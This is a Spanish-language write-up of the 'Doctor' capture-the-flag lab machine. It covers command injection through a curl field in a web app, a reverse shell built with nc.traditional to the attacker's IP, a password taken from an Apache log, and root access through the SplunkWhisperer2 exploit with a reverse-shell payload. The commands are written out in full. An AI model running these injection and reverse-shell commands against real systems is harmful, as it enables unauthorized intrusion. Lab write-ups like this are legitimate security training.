# Doctor

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Command execution
- Curl reverse shell
- Analisis de logs
- SplunkWhisperer2

## Nmap Scan

`nmap -sV -sC -p- 10.10.10.209`

```
Nmap scan report for 10.10.10.209
Host is up (0.063s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Enumeración

Revisando el puerto 80 no se encuentra nada relevante más que un nombre de dominio **doctors.htb**.

![1](img/1.png)

Agregamos el nombre de dominio a nuestro archivo **/etc/hosts** y vemos una página que nos permite registrarnos e iniciar sesión.

##### /etc/hosts
```
10.10.10.209    doctors.htb
```

![2](img/2.png)

Nos creamos un usuario he iniciamos sesión, después de probar las funciones dentro de la aplicación web nos percatamos que es posible usar el comando **curl** dentro de la función **New Message**.

- `python3 -m http.server 80`
- `curl http://10.10.14.228/test`

![3](img/3.png)

Al momento de darle al botón **Post** recibimos la petición en nuestro servidor web.

![4](img/4.png)

### Curl reverse shell

Podemos tomar ventaja de esta situación concatenando algún comando para obtener una reverse shell.

Utilizando el siguiente comando es posible obtener una shell.

- `nc -lvnp 1234`
- `curl http://10.10.14.228/$(nc.traditional$IFS-e/bin/sh$IFS'10.10.14.228'$IFS'1234')`

![5](img/5.png)

## Escalada de Privilegios (User)

Utilizando **linpeas.sh** podemos verifica que tenemos permisos para leer los logs.

- `python3 -m http.server 80`
- `wget http://10.10.14.228/linpeas.sh -O /tmp/linpeas.sh`
- `chmod +x /tmp/linpeas.sh`
- `/tmp/linpeas.sh`

![6](img/6.png)

Revisando los logs el archivo **backup** contiene una petición que se hizo al momento de restablecer el password y se visualiza el mismo.

`cat /var/log/apache2/backup | grep password`

![7](img/7.png)

Este password se puede usar para acceder a la cuenta del usuario **shaun**.

```
shaun:Guitar123
```

`su shaun`

![8](img/8.png)

## Escalada de Privilegios (Root)

Si recordamos el escaneo de nmap podemos ver el puerto **8089** el cual nos pide credenciales para acceder, utilizando las credenciales del usuario **shaun** es posible acceder.

![9](img/9.png)

![10](img/10.png)

### SplunkWhisperer2

> Splunk es un software dedicado al análisis y recopilación de datos generados por sistemas de información de TI, aplicaciones, recopila datos en tiempo real que permiten a los usuarios generar búsquedas sobre información relevante que puede ser reflejada en paneles dinámicos, los datos recopilados se muestran mediante gráficas y puede generar alertas y análisis de datos.

Se visualiza la versión del servicio **Splunk 8.0.5**, investigando exploits llegamos a este [repositorio](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2).

Utilizando el exploit de ejecución remota hecho en Python podemos obtener una reverse shell.

```
python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.228 --username shaun --password Guitar123 --payload 'nc.traditional -e /bin/sh 10.10.14.228 4444'
```

![11](img/11.png)

## Referencias
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite \
https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2